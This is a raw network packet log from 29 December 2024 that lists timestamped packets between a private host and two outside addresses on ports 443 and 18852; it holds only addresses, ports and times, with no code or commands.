                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.059063911 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.059124947 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.059150934 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.059187889 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.066196918 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.066214085 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.066253901 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.066279888 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.066293955 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.066314936 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.074338913 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.074356079 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.074404955 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.074430943 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.074445009 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.074469090 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.083657026 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.083782911 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.083837032 CET4971018852192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.086415052 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.086534977 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.086582899 CET4971018852192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.091866970 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.091976881 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.092020988 CET4971018852192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.097363949 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.097461939 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.097522974 CET4971018852192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.102719069 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.102838993 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.102885008 CET4971018852192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.108222008 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.108292103 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.108338118 CET4971018852192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.113606930 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.113718987 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.113764048 CET4971018852192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.119081974 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.119232893 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.119271994 CET4971018852192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.124524117 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.124599934 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.124646902 CET4971018852192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.129934072 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.130130053 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.130179882 CET4971018852192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.135411024 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.135483027 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.135560036 CET4971018852192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.140789986 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.140887022 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.140933990 CET4971018852192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.146251917 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.146327019 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.146369934 CET4971018852192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.151684999 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.151784897 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.151834011 CET4971018852192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.157111883 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.157211065 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.157255888 CET4971018852192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.162517071 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.214160919 CET4971018852192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.221698999 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.221724033 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.221795082 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.221815109 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.221831083 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.221858025 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.229073048 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.229089975 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.229139090 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.229145050 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.229186058 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.229206085 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.236258030 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.236277103 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.236341000 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.236349106 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.236390114 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.244407892 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.244427919 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.244472027 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.244481087 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.244512081 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.244518995 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.252547026 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.252564907 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.252636909 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.252646923 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.252686024 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.260232925 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.260251999 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.260318995 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.260328054 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.260370016 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.268455029 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.268476963 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.268542051 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.268554926 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.268601894 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.275661945 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.275676966 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.275742054 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.275752068 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.275794983 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.295022964 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.295104027 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.295156956 CET4971018852192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.296367884 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.296509027 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.296557903 CET4971018852192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.300858021 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.300976038 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.301029921 CET4971018852192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.305340052 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.305449963 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.305491924 CET4971018852192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.309855938 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.309961081 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.310014963 CET4971018852192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.314349890 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.314454079 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.314503908 CET4971018852192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.318900108 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.319060087 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.319108009 CET4971018852192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.323354959 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.323468924 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.323525906 CET4971018852192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.327903032 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.328002930 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.328053951 CET4971018852192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.332375050 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.332449913 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.332501888 CET4971018852192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.336898088 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.337021112 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.337070942 CET4971018852192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.341347933 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.341470003 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.341521025 CET4971018852192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.345851898 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.345951080 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.346003056 CET4971018852192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.350332975 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.350445986 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.350502968 CET4971018852192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.354830027 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.354939938 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.355031013 CET4971018852192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.359335899 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.359457016 CET1885249710118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.359530926 CET4971018852192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.423113108 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.423141003 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.423489094 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.423511982 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.423552990 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.430556059 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.430577040 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.430685043 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.430692911 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.430735111 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.437659025 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.437678099 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.437802076 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.437812090 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.437868118 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.445990086 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.446007967 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.446131945 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.446141005 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.446187973 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.454034090 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.454072952 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.454166889 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.454179049 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.454224110 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.461626053 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.461641073 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.461723089 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.461734056 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.461774111 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.469960928 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.469976902 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.470076084 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.470083952 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.470136881 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.477000952 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.477016926 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.477102041 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.477112055 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.477150917 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.624368906 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.624397039 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.624449015 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.624486923 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.624500036 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.627841949 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.631647110 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.631664038 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.631728888 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.631742001 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.631782055 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.639756918 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.639791965 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.639836073 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.639849901 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.639878988 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.639894962 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.647948027 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.647965908 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.648026943 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.648037910 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.648087978 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.655117035 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.655133009 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.655215979 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.655229092 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.655268908 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.662815094 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.662838936 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.662909985 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.662924051 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.662962914 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.670959949 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.670975924 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.671056986 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.671066046 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.671108007 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.679085970 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.679115057 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.679182053 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.679199934 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.679240942 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.825850010 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.825880051 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.825954914 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.825999022 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.826014996 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.827830076 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.833219051 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.833235979 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.833297968 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.833306074 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.833344936 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.841398001 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.841420889 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.841492891 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.841501951 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.841552019 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.848562956 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.848579884 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.848628998 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.848635912 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.848670006 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.848685026 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.856673002 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.856688023 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.856758118 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.856770992 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.856812000 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.864428997 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.864445925 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.864520073 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.864530087 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.864554882 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.864573002 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.872525930 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.872543097 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.872602940 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.872612000 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.872651100 CET49708443192.168.2.747.79.48.211
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.880794048 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.880820990 CET4434970847.79.48.211192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:23.880872011 CET49708443192.168.2.747.79.48.211
